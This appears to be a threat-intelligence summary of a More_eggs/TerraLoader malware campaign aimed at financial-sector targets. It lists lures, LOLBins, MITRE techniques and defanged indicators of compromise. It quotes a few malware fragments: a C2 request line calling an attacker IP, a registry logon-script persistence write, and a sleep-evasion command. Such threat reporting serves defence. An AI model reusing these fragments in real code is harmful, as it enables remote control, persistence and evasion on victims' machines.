OCX#HARVESTER is a threat campaign by Securonix Threat Labs leveraging the More_eggs malware suite to target financial-sector victims, with activity observed from late 2022 through early 2023 and new C2 infrastructure shifts. The campaign uses image-based LNK lure files, LOLBins (Ie4uinit.exe and msxsl.exe), heavily obfuscated JavaScript loaders (TerraLoader), and multiple OCX#HARVESTER payloads to achieve persistence, C2 communication, and data exfiltration. #OCXHARVESTER #More_eggs #TerraLoader #GoldenChickens
Keypoints
- OCX#HARVESTER campaign tracked by Securonix Threat Labs; targets appear linked to financial sector and cryptocurrency activities.
- Phishing with malicious ZIP attachments containing LNK shortcuts disguised as images as the primary delivery method.
- Initial execution uses CMD obfuscation via shortcut files and LOLBins (ie4uinit.exe) to stage the next stage from %TMP%.
- Heavily obfuscated JavaScript loaders (TerraLoader) provide C2 functionality and persistence via registry and appdata paths.
- Multiple OCX#HARVESTER DLL payloads (Camera.OCX#, Bonet.OCX#, Tunner.OCX#) download/upload data and feature Cobalt Strike shellcode in some variants.
- Post-exploitation activity includes credential/data theft (SharpChrome/SharpDPAPI) and extensive command execution via WMI, curl, and scheduled persistence.
MITRE Techniques
- [T1566.001] Phishing – ‘phishing emails containing a malicious compressed zip file appears to be the primary delivery method.’
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – ‘The two image lures take the appearance of a general image icon… The obfuscated command line…’
- [T1218.005] System Binary Proxy Execution: Regsvr32 – ‘…Regsvr32.exe is then used to register the DLL payload.’
- [T1220] XSL Script Processing – ‘Msxsl.exe LOLBin’ to process and execute scripts; heavy obfuscation in JS loaders.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – ‘Persistence: Establish a registry foothold: ActXobj1.RegWrite(“HKCUEnvironmentUserInitMprLogonScript”, …)’
- [T1071.001] Web Protocols – ‘ConnectionLite.open(“GET”, “hxxp://95.179.186[.]167/Writer.php?deploy=” + CommandToRun, false);’
- [T1047] WMI – ‘Commands and other processes can also be executed using Windows Management Instrumentation (WMI) infrastructure.’
- [T1497.003] Long Sleeps – ‘typeperf.exe “SystemProcessor Queue Length” -si {sleep time in seconds} -sc 1’
- [T1070.001] Execution through LOLBins (implicit via Ie4uinit.exe and msxsl.exe) – ‘LOLBin usage: ie4uinit.exe’ and ‘LOLBin usage: msxsl.exe’
- [T1059.001] Command and Scripting Interpreter: PowerShell – referenced in MITRE matrix; observed CMD/WMIC usage in practice (PowerShell logging recommended).
- [T1041] Exfiltration Over C2 Channel – implied by C2 data flows to remote servers and data staging in appdata paths.
Indicators of Compromise
- [IP Address] – Host robots.php: 95.179.201[.]171, 95.179.180[.]224, and 172.86.75[.]75
- [IP Address] – C2: /Writer.php: 95.179.186[.]167
- [IP Address] – C2: telemistry[.]net/get.php?id=xxxxxxx: 95.179.170[.]76
- [IP Address] – Host Tunner.OCX#HARVESTER: 193.149.187[.]170
- [IP Address] – C2 implant: port 1437: 193.149.185[.]229
- [Domain] – telemistry[.]net; telemistry[.]net (DNS activity)
- [Domain] – ukmedia[.]store; ukmedia[.]store/static-directory/html.mp3
- [Domain] – windowsupdatebg.s.llnwi[.]net
- [File name] – screenshots-9201.jpg.zip; robots.php; ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt; QVB3WZXVQG6G8O7V.txt
- [SHA256] – 36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1; 631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6